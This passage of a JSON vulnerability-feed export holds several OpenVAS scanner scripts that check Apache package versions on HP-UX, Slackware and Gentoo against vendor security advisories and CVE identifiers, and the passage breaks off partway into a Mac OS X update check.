B.11.04.\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running \n Apache. These vulnerabilities could be exploited remotely to create a Denial \n of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00944046-1\");\n script_id(835044);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01019\");\n script_cve_id(\"CVE-2003-0079\", \"CVE-2004-0112\");\n script_name( \"HP-UX Update for Apache HPSBUX01019\");\n\n script_summary(\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.49.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.22\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.11.23\", rls:\"HPUX11.22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.04\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTS.VV-IWS\", patch_list:['PHSS_30639'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTS.VV-OPENSSH\", patch_list:['PHSS_30640'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultWS.WS-CORE\", patch_list:['PHSS_30641'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTGP.TGP-CORE\", patch_list:['PHSS_30642'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTS.VV-IWS\", patch_list:['PHSS_30643'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTS.VV-OPENSSH\", patch_list:['PHSS_30644'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultWS.WS-CORE\", patch_list:['PHSS_30645'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTGP.TGP-CORE\", patch_list:['PHSS_30646'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultTS.VV-IWS\", patch_list:['PHSS_30647'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultWS.WS-CORE\", patch_list:['PHSS_30648'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"HP_Webproxy.HPWEB-PX-CORE\", patch_list:['PHSS_30649'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"HP_Webproxy.HPWEB-PX-CORE\", patch_list:['PHSS_30650'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.49.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.49.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.49.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:57:08", "description": "Check for the Version of Apache", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for Apache HPSBUX01022", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0113", "CVE-2004-0174", "CVE-2003-0020"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:835023", "href": "http://plugins.openvas.org/nasl.php?oid=835023", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01022\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n Apache. The vulnerability could be exploited remotely to allow execution of \n arbitrary code or to create a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00943911-1\");\n script_id(835023);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"HPSBUX\", value: \"01022\");\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_name( \"HP-UX Update for Apache HPSBUX01022\");\n\n script_summary(\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.49.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.49.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.49.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.49.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:33", "description": "Check for the Version of Apache", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "HP-UX Update for Apache HPSBUX01022", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0113", "CVE-2004-0174", "CVE-2003-0020"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310835023", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835023", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01022\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n Apache. The vulnerability could be exploited remotely to allow execution of \n arbitrary code or to create a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00943911-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835023\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"HPSBUX\", value: \"01022\");\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_name( \"HP-UX Update for Apache HPSBUX01022\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.49.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.49.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.49.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.49.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:51", "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-133-01.", "cvss3": {}, "published": "2012-09-11T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2004-133-01 apache", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0987", "CVE-2003-0993", "CVE-2004-0174", "CVE-2003-0020"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:136141256231053931", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053931", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_133_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53931\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2003-0987\", \"CVE-2003-0020\", \"CVE-2004-0174\", \"CVE-2003-0993\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-133-01 apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-133-01\");\n\n script_tag(name:\"insight\", value:\"New apache packages are available for Slackware 8.1, 9.0, 9.1, and -current to\nfix security issues. These include a possible denial-of-service attack as well\nas the ability to possible pipe shell escapes through Apache's errorlog (which\ncould create an exploit if the error log is read in a terminal program that\ndoes not filter such escapes). We recommend that sites running Apache upgrade\nto the new Apache package.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-133-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.29-i386-2\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.29-i386-2\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apache\", ver:\"1.3.29-i486-2\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:54", "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-133-01.", "cvss3": {}, "published": "2012-09-11T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2004-133-01 apache", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0987", "CVE-2003-0993", "CVE-2004-0174", "CVE-2003-0020"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:53931", "href": "http://plugins.openvas.org/nasl.php?oid=53931", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_133_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New apache packages are available for Slackware 8.1, 9.0, 9.1, and -current to\nfix security issues. These include a possible denial-of-service attack as well\nas the ability to possible pipe shell escapes through Apache's errorlog (which\ncould create an exploit if the error log is read in a terminal program that\ndoes not filter such escapes). We recommend that sites running Apache upgrade\nto the new Apache package.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2004-133-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-133-01\";\n \nif(description)\n{\n script_id(53931);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2003-0987\", \"CVE-2003-0020\", \"CVE-2004-0174\", \"CVE-2003-0993\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2004-133-01 apache \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.29-i386-2\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.29-i386-2\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apache\", ver:\"1.3.29-i486-2\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-30T10:46:22", "description": "The remote host is missing updates announced in\nadvisory GLSA 200405-22.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200405-22 (Apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0987", "CVE-2003-0993", "CVE-2004-0174", "CVE-2003-0020"], "modified": "2017-10-26T00:00:00", "id": "OPENVAS:54582", "href": "http://plugins.openvas.org/nasl.php?oid=54582", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several security vulnerabilities have been fixed in the latest release of\nApache 1.3.\";\ntag_solution = \"All users should upgrade to the latest stable version of Apache 1.3.\n\n # emerge sync\n\n # emerge -pv '>=net-www/apache-1.3.31'\n # emerge '>=net-www/apache-1.3.31'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200405-22\nhttp://bugs.gentoo.org/show_bug.cgi?id=51815\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200405-22.\";\n\n \n\nif(description)\n{\n script_id(54582);\n script_version(\"$Revision: 7585 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 17:03:01 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2003-0993\", \"CVE-2003-0020\", \"CVE-2003-0987\", \"CVE-2004-0174\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200405-22 (Apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/apache\", unaffected: make_list(\"ge 1.3.31\"), vulnerable: make_list(\"lt 1.3.31\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:11", "description": "The remote host is missing Mac OS X 10.6.3 Update / Mac OS X Security Update 2010-002.", "cvss3": {}, "published": "2010-05-12T00:00:00", "type": "openvas", "title": "Mac OS X 10.6.3 Update / Mac OS X Security Update 2010-002", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0060", "CVE-2010-0517", "CVE-2010-0505", "CVE-2009-2906", "CVE-2008-0564", "CVE-2010-0041", "CVE-2009-2446", "CVE-2009-3558", "CVE-2009-2417", "CVE-2008-0888", "CVE-2010-0498", "CVE-2010-0506", "CVE-2009-2632", "CVE-2008-5302", "CVE-2009-0033", "CVE-2008-4456", "CVE-2010-0515", "CVE-2010-0500", "CVE-2009-1904", "CVE-2010-0537", "CVE-2009-4030", "CVE-2010-0522", "CVE-2008-5303", "CVE-2010-0520", "CVE-2010-0504", "CVE-2010-0514", "CVE-2009-2693", "CVE-2010-0519", "CVE-2009-2042", "CVE-2010-0510", "CVE-2010-0511", "CVE-2009-0580", "CVE-2010-0512", "CVE-2009-0781", "CVE-2009-4214", "CVE-2008-5515", "CVE-2003-0063", "CVE-2009-2801", "CVE-2010-0055", "CVE-2009-0688", "CVE-2010-0523", "CVE-2010-0497", "CVE-2010-0503", "CVE-2010-0056", "CVE-2010-0533", "CVE-2010-0501", "CVE-2009-0316", "CVE-2009-3009", "CVE-2010-0062", "CVE-2009-4142", "CVE-2010-0507", "CVE-2010-0508", "CVE-2009-0689", "CVE-2009-0037", "CVE-2010-0525", "CVE-2009-2901", "CVE-2008-4101", "CVE-2010-0063", "CVE-2010-0065", "CVE-2010-0509", "CVE-2009-2422", "CVE-2009-3095", "CVE-2010-0058", "CVE-2010-0059", "CVE-2009-4017", "CVE-2010-0535", "CVE-2009-0783", "CVE-2009-4143", "CVE-2010-0043", "CVE-2010-0518", "CVE-2010-0526", "CVE-2010-0516", "CVE-2010-0513", "CVE-2009-3559", "CVE-2010-0502", "CVE-2008-7247", "CVE-2006-1329", "CVE-2009-2902", "CVE-2010-0057", "CVE-2008-2712", "CVE-2009-4019", "CVE-2010-0521", "CVE-2010-0393", "CVE-2010-0524", "CVE-2010-0064", "CVE-2010-0534", "CVE-2010-0042", "CVE-2009-3557"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310102039", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310102039", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n# $Id: macosx_upd_10_6_3_secupd_2010-002.nasl 14307 2019-03-19 10:09:27Z cfischer $\n#\n# Mac OS X 10.6.3 Update / Mac OS X Security Update 2010-002\n#\n# LSS-NVT-2010-028\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be 